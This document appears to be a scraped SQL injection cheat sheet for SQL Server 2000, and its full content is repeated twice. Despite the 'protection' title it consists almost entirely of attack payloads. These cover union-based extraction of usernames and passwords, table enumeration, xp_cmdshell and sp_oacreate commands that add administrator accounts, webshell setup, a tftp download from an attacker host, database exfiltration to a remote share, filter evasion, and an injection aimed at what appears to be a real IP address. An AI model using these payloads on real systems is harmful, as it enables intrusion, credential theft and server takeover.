SQL Server 2000 Injection Protection Collection (I)
Sql injection originated from 'or'1'='1
The most important table name:
select * from sysobjects
sysobjects ncsysobjects
sysindexes tsysindexes
syscolumns
systypes
sysusers
sysdatabases
sysxlogins
sysprocesses
Some of the most important user names (which exist in the default SQL database)
public
dbo
guest (usually prohibited, or no permissions)
db_sercurityadmin
ab_dlladmin
Some default extensions
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
xp_availablemedia drive related
xp_dirtree directory
xp_enumdsn ODBC connection
xp_loginconfig server security mode information
xp_makecab Creates a compressed volume
xp_ntsec_enumdomains domain information
xp_terminate_process terminal process, give a PID
For example:
sp_addextendedproc 'xp_webserver', 'c:\temp\xp_foo.dll'
exec xp_webserver
sp_dropextendedproc 'xp_webserver'
bcp "select * FROM test..foo" queryout c:\inetpub\wwwroot\
-c -Slocalhost -Usa -Pfoobar
' group by having 1=1-
' group by , , , having 1=1-
'; insert into users values( 666, 'attacker', 'foobar', 0xffff )-
union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable'-
union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable' where COLUMN_NAME NOT IN ('login_id')-
union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable' where COLUMN_NAME NOT IN ('login_id','login_name')-
union select TOP 1 login_name FROM logintable-
union select TOP 1 password FROM logintable where login_name='Rahul'--
Construct statement: Query whether xp_cmdshell exists
' union select @@version,1,1,1--
and 1=(select @@VERSION)
and 'sa'=(select System_user)
' union select ret,1,1,1 from foo--
' union select min(username),1,1,1 from users where username > 'a'-
' union select min(username),1,1,1 from users where username > 'admin'-
' union select password,1,1,1 from users where username = 'admin'--
and user_name()='dbo'
and 0<>(select user_name()-
; DECLARE @shell INT EXEC SP_OAcreate '',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\ /c net user swap 5245886 /add'
and 1=(select count(*) FROM where
xtype = 'X' AND name = 'xp_cmdshell')
;EXEC .sp_addextendedproc 'xp_cmdshell', ''
1=(%20select%20count(*)%20from%%20where%20xtype='x'%20and%20name='xp_cmdshell')
and 1=(select IS_SRVROLEMEMBER('sysadmin')) determines whether sa permission is
and 0<>(select top 1 paths from newtable)--Breaking library method
and 1=(select name from where dbid=7) Get the library name (from 1 to 5, it is the system id, and only 6 or above can be judged)
Create a virtual directory E disk:
declare @o int exec sp_oacreate '', @o out exec sp_oamethod @o, 'run', NULL,' c:\inetpub\wwwroot\ -w "Default Web Site" -v "e","e:\"'
Access properties: (Write to a webshell)
declare @o int exec sp_oacreate '', @o out exec sp_oamethod @o, 'run', NULL,' c:\inetpub\wwwroot\ -a w3svc/1/ROOT/e +browse'
and 0<>(select count(*) from where name>1 and dbid=6)
Submit dbid = 7,8,9.. to get more database names
and 0<>(select top 1 name from where xtype='U') Breaking to a table Assume it is admin
and 0<>(select top 1 name from where xtype='U' and name not in ('Admin')) to get other tables.
and 0<>(select count(*) from where xtype='U' and name='admin'
and uid>(str(id))) The value of the burst-to-UID is assumed to be 18779569 uid=id
and 0<>(select top 1 name from where id=18779569) Get a field of admin, assuming it is user_id
and 0<>(select top 1 name from where id=18779569 and name not in
('id',...)) to break out other fields
and 0<(select user_id from where username>1)
You can get the username and you can get the password in turn. . . . . Assume that there are fields such as user_id username, password, etc.
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin
(Uion statements are popular everywhere, access is easy to use.
Special tips for blasting library::%5c='\' Or modify / and \ to submit %5
and 0<>(select count(*) from where name>1 and dbid=6)
and 0<>(select top 1 name from where xtype='U') get the table name
and 0<>(select top 1 name from where xtype='U' and name not in('Address'))
and 0<>(select count(*) from where xtype='U' and name='admin' and uid>(str(id)))) Determine the id value
and 0<>(select top 1 name from where id=773577794) All fields
_blank>/?id=3400;create table [dbo].[swap] ([swappass][char](255));--
_blank>/?id=3400 and (select top 1 swappass from swap)=1
;create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\', @value_name='/', values=@test OUTPUT insert into paths(path) values(@test)
_blank>http://61.131.96.39/?TianName=Policy and Regulations&InfoID={57C4165A-4206-4C0D-A8D2-E70666EE4E08};use%20master;declare%20@s%20%20int;exec%20sp_oacreate%20"",@s%20out;exec%20sp_oamethod%20@s,"run",NULL,"%20/c%20ping%201.1.1";-
I got the web path d:\xxxx, next:
_blank>/?id=3400;use ku1;--
_blank>/?id=3400;create table cmd (str image);--
The traditional test process of xp_cmdshell:
;exec master..xp_cmdshell 'dir'
;exec .sp_addlogin hax;--
;exec .sp_password null,hax,hax;--
;exec .sp_addsrvrolemember hax sysadmin;--
;exec .xp_cmdshell 'net user hax 5258 /workstations:* /times:all /passwordchg:yes /passwordreq:yes / active:yes /add';--
;exec .xp_cmdshell 'net localgroup administrators hax /add';--
exec master..xp_servicecontrol 'start', 'schedule'
exec master..xp_servicecontrol 'start', 'server'
http:///?classid=1; DECLARE @shell INT EXEC SP_OAcreate '',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\ /c net user swap 5258 /add'
;DECLARE @shell INT EXEC SP_OAcreate '',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\ /c net localgroup administrators swap/add'
_blank>http://localhost/?id=1'; exec master..xp_cmdshell 'tftp -i youip get '-
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'
;declare @a;set @a=db_name();backup database @a to disk='Your IP Your shared directory'
If restricted, it is OK.
select * from openrowset('sqloledb','server';'sa';'','select ''OK!'' exec .sp_addlogin hax')
Sql injection originated from 'or'1'='1
The most important table name:
select * from sysobjects
sysobjects ncsysobjects
sysindexes tsysindexes
syscolumns
systypes
sysusers
sysdatabases
sysxlogins
sysprocesses
Some of the most important user names (which exist in the default SQL database)
public
dbo
guest (usually prohibited, or no permissions)
db_sercurityadmin
ab_dlladmin
Some default extensions
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
xp_availablemedia drive related
xp_dirtree directory
xp_enumdsn ODBC connection
xp_loginconfig server security mode information
xp_makecab Creates a compressed volume
xp_ntsec_enumdomains domain information
xp_terminate_process terminal process, give a PID
For example:
sp_addextendedproc 'xp_webserver', 'c:\temp\xp_foo.dll'
exec xp_webserver
sp_dropextendedproc 'xp_webserver'
bcp "select * FROM test..foo" queryout c:\inetpub\wwwroot\
-c -Slocalhost -Usa -Pfoobar
' group by having 1=1-
' group by , , , having 1=1-
'; insert into users values( 666, 'attacker', 'foobar', 0xffff )-
union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable'-
union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable' where COLUMN_NAME NOT IN ('login_id')-
union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable' where COLUMN_NAME NOT IN ('login_id','login_name')-
union select TOP 1 login_name FROM logintable-
union select TOP 1 password FROM logintable where login_name='Rahul'--
Construct statement: Query whether xp_cmdshell exists
' union select @@version,1,1,1--
and 1=(select @@VERSION)
and 'sa'=(select System_user)
' union select ret,1,1,1 from foo--
' union select min(username),1,1,1 from users where username > 'a'-
' union select min(username),1,1,1 from users where username > 'admin'-
' union select password,1,1,1 from users where username = 'admin'--
and user_name()='dbo'
and 0<>(select user_name()-
; DECLARE @shell INT EXEC SP_OAcreate '',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\ /c net user swap 5245886 /add'
and 1=(select count(*) FROM where
xtype = 'X' AND name = 'xp_cmdshell')
;EXEC .sp_addextendedproc 'xp_cmdshell', ''
1=(%20select%20count(*)%20from%%20where%20xtype='x'%20and%20name='xp_cmdshell')
and 1=(select IS_SRVROLEMEMBER('sysadmin')) determines whether sa permission is
and 0<>(select top 1 paths from newtable)--Breaking library method
and 1=(select name from where dbid=7) Get the library name (from 1 to 5, it is the system id, and only 6 or above can be judged)
Create a virtual directory E disk:
declare @o int exec sp_oacreate '', @o out exec sp_oamethod @o, 'run', NULL,' c:\inetpub\wwwroot\ -w "Default Web Site" -v "e","e:\"'
Access properties: (Write to a webshell)
declare @o int exec sp_oacreate '', @o out exec sp_oamethod @o, 'run', NULL,' c:\inetpub\wwwroot\ -a w3svc/1/ROOT/e +browse'
and 0<>(select count(*) from where name>1 and dbid=6)
Submit dbid = 7,8,9.. to get more database names
and 0<>(select top 1 name from where xtype='U') Breaking to a table Assume it is admin
and 0<>(select top 1 name from where xtype='U' and name not in ('Admin')) to get other tables.
and 0<>(select count(*) from where xtype='U' and name='admin'
and uid>(str(id))) The value of the burst-to-UID is assumed to be 18779569 uid=id
and 0<>(select top 1 name from where id=18779569) Get a field of admin, assuming it is user_id
and 0<>(select top 1 name from where id=18779569 and name not in
('id',...)) to break out other fields
and 0<(select user_id from where username>1)
You can get the username and you can get the password in turn. . . . . Assume that there are fields such as user_id username, password, etc.
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin
(Uion statements are popular everywhere, access is easy to use.
Special tips for blasting library::%5c='\' Or modify / and \ to submit %5
and 0<>(select count(*) from where name>1 and dbid=6)
and 0<>(select top 1 name from where xtype='U') get the table name
and 0<>(select top 1 name from where xtype='U' and name not in('Address'))
and 0<>(select count(*) from where xtype='U' and name='admin' and uid>(str(id)))) Determine the id value
and 0<>(select top 1 name from where id=773577794) All fields
_blank>/?id=3400;create table [dbo].[swap] ([swappass][char](255));--
_blank>/?id=3400 and (select top 1 swappass from swap)=1
;create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\', @value_name='/', values=@test OUTPUT insert into paths(path) values(@test)
_blank>http://61.131.96.39/?TianName=Policy and Regulations&InfoID={57C4165A-4206-4C0D-A8D2-E70666EE4E08};use%20master;declare%20@s%20%20int;exec%20sp_oacreate%20"",@s%20out;exec%20sp_oamethod%20@s,"run",NULL,"%20/c%20ping%201.1.1";-
I got the web path d:\xxxx, next:
_blank>/?id=3400;use ku1;--
_blank>/?id=3400;create table cmd (str image);--
The traditional test process of xp_cmdshell:
;exec master..xp_cmdshell 'dir'
;exec .sp_addlogin hax;--
;exec .sp_password null,hax,hax;--
;exec .sp_addsrvrolemember hax sysadmin;--
;exec .xp_cmdshell 'net user hax 5258 /workstations:* /times:all /passwordchg:yes /passwordreq:yes / active:yes /add';--
;exec .xp_cmdshell 'net localgroup administrators hax /add';--
exec master..xp_servicecontrol 'start', 'schedule'
exec master..xp_servicecontrol 'start', 'server'
http:///?classid=1; DECLARE @shell INT EXEC SP_OAcreate '',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\ /c net user swap 5258 /add'
;DECLARE @shell INT EXEC SP_OAcreate '',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\ /c net localgroup administrators swap/add'
_blank>http://localhost/?id=1'; exec master..xp_cmdshell 'tftp -i youip get '-
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'
;declare @a;set @a=db_name();backup database @a to disk='Your IP Your shared directory'
If restricted, it is OK.
select * from openrowset('sqloledb','server';'sa';'','select ''OK!'' exec .sp_addlogin hax')